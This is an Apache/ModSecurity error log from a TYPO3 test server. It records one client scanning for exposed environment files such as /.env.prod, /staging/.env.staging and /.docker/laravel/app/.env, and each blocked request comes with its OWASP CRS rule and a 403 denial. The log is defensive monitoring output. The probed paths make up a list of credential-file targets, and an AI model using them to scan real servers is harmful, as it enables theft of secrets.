[Thu Jan 08 21:18:18.680553 2026] [:error] [pid 1270038] [client 18.119.100.98:36190] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /project/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/project/.env.local"] [unique_id "aWARChmwMJtANIcuNUXpLgAAAAM"]
[Thu Jan 08 21:18:18.680763 2026] [:error] [pid 1270038] [client 18.119.100.98:36190] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/project/.env.local"] [unique_id "aWARChmwMJtANIcuNUXpLgAAAAM"]
[Thu Jan 08 21:18:18.680923 2026] [:error] [pid 1270038] [client 18.119.100.98:36190] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/project/.env.local"] [unique_id "aWARChmwMJtANIcuNUXpLgAAAAM"]
[Thu Jan 08 21:18:19.032623 2026] [:error] [pid 1270039] [client 18.119.100.98:36304] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shop/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/shop/.env.staging"] [unique_id "aWARC5ccQYhM1DUhi_W7EwAAAAQ"]
[Thu Jan 08 21:18:19.032838 2026] [:error] [pid 1270039] [client 18.119.100.98:36304] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/shop/.env.staging"] [unique_id "aWARC5ccQYhM1DUhi_W7EwAAAAQ"]
[Thu Jan 08 21:18:19.032998 2026] [:error] [pid 1270039] [client 18.119.100.98:36304] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/shop/.env.staging"] [unique_id "aWARC5ccQYhM1DUhi_W7EwAAAAQ"]
[Thu Jan 08 21:18:19.383453 2026] [:error] [pid 1270043] [client 18.119.100.98:36418] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aWARCwvEr1EpOYnVfM6rzgAAAAc"]
[Thu Jan 08 21:18:19.383701 2026] [:error] [pid 1270043] [client 18.119.100.98:36418] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aWARCwvEr1EpOYnVfM6rzgAAAAc"]
[Thu Jan 08 21:18:19.383863 2026] [:error] [pid 1270043] [client 18.119.100.98:36418] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aWARCwvEr1EpOYnVfM6rzgAAAAc"]
[Thu Jan 08 21:18:19.734551 2026] [:error] [pid 1270035] [client 18.119.100.98:36540] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/staging/.env.staging"] [unique_id "aWARCyYqm_i2BUcmtQb4wwAAAAA"]
[Thu Jan 08 21:18:19.734773 2026] [:error] [pid 1270035] [client 18.119.100.98:36540] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/staging/.env.staging"] [unique_id "aWARCyYqm_i2BUcmtQb4wwAAAAA"]
[Thu Jan 08 21:18:19.734935 2026] [:error] [pid 1270035] [client 18.119.100.98:36540] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/staging/.env.staging"] [unique_id "aWARCyYqm_i2BUcmtQb4wwAAAAA"]
[Thu Jan 08 21:18:20.084604 2026] [:error] [pid 1270041] [client 18.119.100.98:36660] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env.local"] [unique_id "aWARDM3GwEx_BV8-CrWUTwAAAAU"]
[Thu Jan 08 21:18:20.084817 2026] [:error] [pid 1270041] [client 18.119.100.98:36660] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env.local"] [unique_id "aWARDM3GwEx_BV8-CrWUTwAAAAU"]
[Thu Jan 08 21:18:20.084976 2026] [:error] [pid 1270041] [client 18.119.100.98:36660] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env.local"] [unique_id "aWARDM3GwEx_BV8-CrWUTwAAAAU"]
[Thu Jan 08 21:18:20.431977 2026] [:error] [pid 1270042] [client 18.119.100.98:36764] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /stg/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/stg/.env.local"] [unique_id "aWARDC7RlX2cRjHcFz6xywAAAAY"]
[Thu Jan 08 21:18:20.432197 2026] [:error] [pid 1270042] [client 18.119.100.98:36764] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/stg/.env.local"] [unique_id "aWARDC7RlX2cRjHcFz6xywAAAAY"]
[Thu Jan 08 21:18:20.432373 2026] [:error] [pid 1270042] [client 18.119.100.98:36764] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/stg/.env.local"] [unique_id "aWARDC7RlX2cRjHcFz6xywAAAAY"]
[Thu Jan 08 21:18:20.780678 2026] [:error] [pid 1283304] [client 18.119.100.98:36882] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aWARDGAwUIZgFNkik8yVRgAAAAg"]
[Thu Jan 08 21:18:20.780887 2026] [:error] [pid 1283304] [client 18.119.100.98:36882] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aWARDGAwUIZgFNkik8yVRgAAAAg"]
[Thu Jan 08 21:18:20.781035 2026] [:error] [pid 1283304] [client 18.119.100.98:36882] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aWARDGAwUIZgFNkik8yVRgAAAAg"]
[Thu Jan 08 21:18:21.132894 2026] [:error] [pid 1270036] [client 18.119.100.98:36980] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aWARDeM1154Q6b0hewij7wAAAAE"]
[Thu Jan 08 21:18:21.133100 2026] [:error] [pid 1270036] [client 18.119.100.98:36980] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aWARDeM1154Q6b0hewij7wAAAAE"]
[Thu Jan 08 21:18:21.133250 2026] [:error] [pid 1270036] [client 18.119.100.98:36980] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aWARDeM1154Q6b0hewij7wAAAAE"]
[Thu Jan 08 21:18:21.480463 2026] [:error] [pid 1270037] [client 18.119.100.98:37112] [client 18.119.100.98] ModSecurity: Warning. Matched phrase ".docker/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .docker/ found within REQUEST_FILENAME: /.docker/laravel/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/laravel/app/.env"] [unique_id "aWARDeA_IfWyU2EIiRhOjwAAAAI"]
[Thu Jan 08 21:18:21.480678 2026] [:error] [pid 1270037] [client 18.119.100.98:37112] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/laravel/app/.env"] [unique_id "aWARDeA_IfWyU2EIiRhOjwAAAAI"]
[Thu Jan 08 21:18:21.480831 2026] [:error] [pid 1270037] [client 18.119.100.98:37112] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/laravel/app/.env"] [unique_id "aWARDeA_IfWyU2EIiRhOjwAAAAI"]
[Thu Jan 08 21:18:21.831693 2026] [:error] [pid 1280390] [client 18.119.100.98:37228] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /test/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/test/.env.production"] [unique_id "aWARDdKTJIy7S9W5nL2LSgAAAAk"]
[Thu Jan 08 21:18:21.831902 2026] [:error] [pid 1280390] [client 18.119.100.98:37228] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/test/.env.production"] [unique_id "aWARDdKTJIy7S9W5nL2LSgAAAAk"]
[Thu Jan 08 21:18:21.832052 2026] [:error] [pid 1280390] [client 18.119.100.98:37228] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/test/.env.production"] [unique_id "aWARDdKTJIy7S9W5nL2LSgAAAAk"]
[Thu Jan 08 21:18:22.182458 2026] [:error] [pid 1270038] [client 18.119.100.98:37342] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /client/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/client/.env"] [unique_id "aWARDhmwMJtANIcuNUXpLwAAAAM"]
[Thu Jan 08 21:18:22.182663 2026] [:error] [pid 1270038] [client 18.119.100.98:37342] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/client/.env"] [unique_id "aWARDhmwMJtANIcuNUXpLwAAAAM"]
[Thu Jan 08 21:18:22.182812 2026] [:error] [pid 1270038] [client 18.119.100.98:37342] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/client/.env"] [unique_id "aWARDhmwMJtANIcuNUXpLwAAAAM"]
[Thu Jan 08 21:18:22.532422 2026] [:error] [pid 1270039] [client 18.119.100.98:37464] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /qa/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/qa/.env.staging"] [unique_id "aWARDpccQYhM1DUhi_W7FAAAAAQ"]
[Thu Jan 08 21:18:22.532637 2026] [:error] [pid 1270039] [client 18.119.100.98:37464] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/qa/.env.staging"] [unique_id "aWARDpccQYhM1DUhi_W7FAAAAAQ"]
[Thu Jan 08 21:18:22.532801 2026] [:error] [pid 1270039] [client 18.119.100.98:37464] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/qa/.env.staging"] [unique_id "aWARDpccQYhM1DUhi_W7FAAAAAQ"]
[Thu Jan 08 21:18:22.879841 2026] [authz_core:error] [pid 1270043] [client 18.119.100.98:37584] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/properties.ini
[Thu Jan 08 21:18:23.229330 2026] [:error] [pid 1270035] [client 18.119.100.98:37694] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public_html/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public_html/.env.staging"] [unique_id "aWARDyYqm_i2BUcmtQb4xAAAAAA"]
[Thu Jan 08 21:18:23.229543 2026] [:error] [pid 1270035] [client 18.119.100.98:37694] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public_html/.env.staging"] [unique_id "aWARDyYqm_i2BUcmtQb4xAAAAAA"]
[Thu Jan 08 21:18:23.229704 2026] [:error] [pid 1270035] [client 18.119.100.98:37694] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public_html/.env.staging"] [unique_id "aWARDyYqm_i2BUcmtQb4xAAAAAA"]
[Thu Jan 08 21:18:23.575998 2026] [:error] [pid 1270041] [client 18.119.100.98:37814] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env.staging"] [unique_id "aWARD83GwEx_BV8-CrWUUAAAAAU"]
